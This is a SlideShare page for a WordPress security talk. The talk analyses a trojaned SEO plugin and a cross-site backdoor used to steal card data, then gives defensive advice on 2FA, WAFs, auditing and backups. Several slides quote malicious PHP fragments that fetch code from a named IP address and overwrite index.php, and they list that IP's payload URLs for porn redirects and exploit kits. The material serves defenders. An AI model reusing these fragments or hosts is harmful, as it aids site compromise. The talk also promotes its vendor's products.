WordPress Security
Learning From Website Hacks
This is me!
Sucuri Inc.
Website Security
o Incident Handling
o Log Analysis
o
o

Tony Perez, COO - Sucuri, Inc.

sucuri.ne...
Let’s Learn from Website Attacks
Analyze some of the things we have seen in
recent days/weeks, and better understand
what ...
Attack Scenerios
o

The Art of Phishing

o

Stealing Credit Cards

Tony Perez, COO - Sucuri, Inc.

sucuri.net

@perezbox
Scenerio Uno (One)
The art of Phishing Naive Users
Attack of Opportunity
o

Holiday season / Holiday spirit

o

Did you say Free?

Tony Perez, COO - Sucuri, Inc.

sucuri.net...
Red Flag[s]
<A
href="http://www.[infecteddomain].com.au/wp
-content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pa...
Difference
o
o

Pro Version?
Legit Version?
Modified file: aioseop_class.php

Tony Perez, COO - Sucuri, Inc.

sucuri.net

...
Intent
o Redirection - porn or exploit kits
o Target: index.php
o Taking content from here:
$code_txt = 'http://91.239.15....
How?
o Index.php payload:

o Using curl to pull content from here:
$url = http://91.239.15.61/java/google.php;

Tony Perez...
Payload

o Pulls content from:
http://91.239.15.61/google.js - Redirection to Porn Sites
http://91.239.15.61/g.php - Explo...
Lesson to Be Learned
o

Trust but verify sources

o

This is not isolated to just plugins, it can happen to
themes as well...
Scenerio Dos (Two)
Got e-Commerce? Leverage 3rd-party
CMS applications in your stack?
Got e-Commerce?
o

Business owners <3 E-commerce

o

CMS extensibility = WooCommerce
o Quick setup of payment collection s...
Big Target
o

Credit Card = Cha-Ching

o

Used/shared/sold underground

o

Impact is catastrophic
o Blacklisting
o Ban

o
...
Cross-contamination
Simple concept in which your website is attacked and
infected by a neighboring site in the same
enviro...
vBulletin
o

Popular CMS Application for Forums

o

WordPress + vBulletin Configurations Common

Tony Perez, COO - Sucuri,...
Scenerio
o

WordPress: Main website | Blog | e-Commerce

o

vBulletin: Forum

o

1 Server

Tony Perez, COO - Sucuri, Inc.
...
Payload
Found here: /wp-admin/includes/list.php

Tony Perez, COO - Sucuri, Inc.

sucuri.net

@perezbox
How?
o

It’s about the journey folks…

Tony Perez, COO - Sucuri, Inc.

sucuri.net

@perezbox
Scenerio
o

list.php?

o

shop.txt?

Tony Perez, COO - Sucuri, Inc.

sucuri.net

@perezbox
That’s Interesting

/forum/ajax.php?edit=

Tony Perez, COO - Sucuri, Inc.

sucuri.net

@perezbox
vBulletin Plugin
o

Backdoor shell was installed into vBulletin giving
the attacker the tools they needed to attack the
Wo...
Dump of Users

Tony Perez, COO - Sucuri, Inc.

sucuri.net

@perezbox
Attack Vector
o

Access Control

Tony Perez, COO - Sucuri, Inc.

sucuri.net

@perezbox
Lessons to be Learned
o

Attackers are smart – surprise!!!

o

Cross-contamination is a real threat today!

o

Must be dil...
What can you do?
Lets get proactive!
Harsh Reality
None of the security plugins out there would
have prevented either of these attacks. So much
for all those h...
Two Important Vectors
o

Access control
o Within your control…

o

Software vulnerabilities
o Not so much…

Tony Perez, CO...
Defense in Depth
• There is no single cure
• Layered Defenses
• Combination of tools and actions
– Combine: Protection and...
Access Control
o Google Authenticator – 2FA
o http://wordpress.org/plugins/google-authenticator/
o Duo Security – 2FA
o ht...
Software Vulnerabilities
o Trusted Sources
o Start with the repo and established communities
o If you’re not a developer t...
Auditing
• Know what is going on with your site
– Integrity Checks
– Logging in / Logging out
– Changes being made

• More...
If all else fails…
o Be sure you have backups…
o VaultPress – WordPress Sites
o Sucuri Backups – WordPress and Everything ...
Tony Perez
@perezbox | @sucuri_security

tony@sucuri.net
#wordsesh

Tony Perez, COO - Sucuri, Inc.

sucuri.net

@perezbox
WordPress Security - Learning From Hacks
WordPress Security - Learning From Hacks
Upcoming SlideShare
Loading in...5
×

WordPress Security - Learning From Hacks

2,258

Published on

Published in: Education, Technology, Business
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
2,258
On Slideshare
0
From Embeds
0
Number of Embeds
11
Actions
Shares
0
Downloads
18
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • Defense in depth is a pretty standard phrase used in the security world in which there is no dependency on any one control, but rather a series of controls implemented throughout the stack to ensure the integrity and security. It’s simple and effective, yet many don’t apply it for whatever reason. We’re too busy focusing on that quick solution that will end all my problems. That one plugins that will harden my entire site to the point where I won’t be able to access it and none of my plugins will work.
  • Be sure to check out Jason Cosper’s presentation earlier this evening, should be up on WordSesh soon, but he goes through some good tips on hardening your WordPress site.
  • WordPress Security - Learning From Hacks

    1. 1. WordPress Security Learning From Website Hacks
    2. 2. This is me! Sucuri Inc. Website Security o Incident Handling o Log Analysis o o Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    3. 3. Let’s Learn from Website Attacks Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    4. 4. Attack Scenerios o The Art of Phishing o Stealing Credit Cards Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    5. 5. Scenerio Uno (One) The art of Phishing Naive Users
    6. 6. Attack of Opportunity o Holiday season / Holiday spirit o Did you say Free? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    7. 7. Red Flag[s] <A href="http://www.[infecteddomain].com.au/wp -content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A> Red Alert: http://www.[infecteddomain].com.au Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    8. 8. Difference o o Pro Version? Legit Version? Modified file: aioseop_class.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    9. 9. Intent o Redirection - porn or exploit kits o Target: index.php o Taking content from here: $code_txt = 'http://91.239.15.61/o1.txt’; o Placing it in the files here: $index_path = $path.'/index.php'; if(file_put_contents($index_path, $code)){ Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    10. 10. How? o Index.php payload: o Using curl to pull content from here: $url = http://91.239.15.61/java/google.php; Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    11. 11. Payload o Pulls content from: http://91.239.15.61/google.js - Redirection to Porn Sites http://91.239.15.61/g.php - Exploit Kits Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    12. 12. Lesson to Be Learned o Trust but verify sources o This is not isolated to just plugins, it can happen to themes as well o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant! o The vulnerability was the website administrator… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    13. 13. Scenerio Dos (Two) Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
    14. 14. Got e-Commerce? o Business owners <3 E-commerce o CMS extensibility = WooCommerce o Quick setup of payment collection systems for goods o Awesome, right? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    15. 15. Big Target o Credit Card = Cha-Ching o Used/shared/sold underground o Impact is catastrophic o Blacklisting o Ban o No more cash flow! No more Trust! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    16. 16. Cross-contamination Simple concept in which your website is attacked and infected by a neighboring site in the same environment Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    17. 17. vBulletin o Popular CMS Application for Forums o WordPress + vBulletin Configurations Common Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    18. 18. Scenerio o WordPress: Main website | Blog | e-Commerce o vBulletin: Forum o 1 Server Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    19. 19. Payload Found here: /wp-admin/includes/list.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    20. 20. How? o It’s about the journey folks… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    21. 21. Scenerio o list.php? o shop.txt? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    22. 22. That’s Interesting /forum/ajax.php?edit= Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    23. 23. vBulletin Plugin o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    24. 24. Dump of Users Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    25. 25. Attack Vector o Access Control Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    26. 26. Lessons to be Learned o Attackers are smart – surprise!!! o Cross-contamination is a real threat today! o Must be diligent across our stack! o Isolate applications if possible. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    27. 27. What can you do? Lets get proactive!
    28. 28. Harsh Reality None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips.. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    29. 29. Two Important Vectors o Access control o Within your control… o Software vulnerabilities o Not so much… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    30. 30. Defense in Depth • There is no single cure • Layered Defenses • Combination of tools and actions – Combine: Protection and Detection Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    31. 31. Access Control o Google Authenticator – 2FA o http://wordpress.org/plugins/google-authenticator/ o Duo Security – 2FA o http://wordpress.org/plugins/duo-wordpress/ o Login Secure Solutions – Policy / Enforcement o http://wordpress.org/plugins/login-security-solution/ o Sucuri CloudProxy / Detection / Remedation - Complete Website Security o http://sucuri.net/signup Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    32. 32. Software Vulnerabilities o Trusted Sources o Start with the repo and established communities o If you’re not a developer this is going to be beyond your reach mostly o Web Application Firewall (WAF) Plugins o Highly ineffective, evading and bypassing is easy o Cause Denial of Service attacks o SaaS based Web Application Firewall (WAF) more effective! o Sucuri CloudProxy WAF Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    33. 33. Auditing • Know what is going on with your site – Integrity Checks – Logging in / Logging out – Changes being made • More important than half the hardening tips you read on line today • Options: – WP Security Audit log http://wordpress.org/plugins/wp-securityaudit-log/ – Sucuri Premium Plugin http://wordpress.sucuri.net Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    34. 34. If all else fails… o Be sure you have backups… o VaultPress – WordPress Sites o Sucuri Backups – WordPress and Everything else o SaaS based Backups more effective! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    35. 35. Tony Perez @perezbox | @sucuri_security tony@sucuri.net #wordsesh Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
    1. A particular slide catching your eye?

      Clipping is a handy way to collect important slides you want to go back to later.

    ×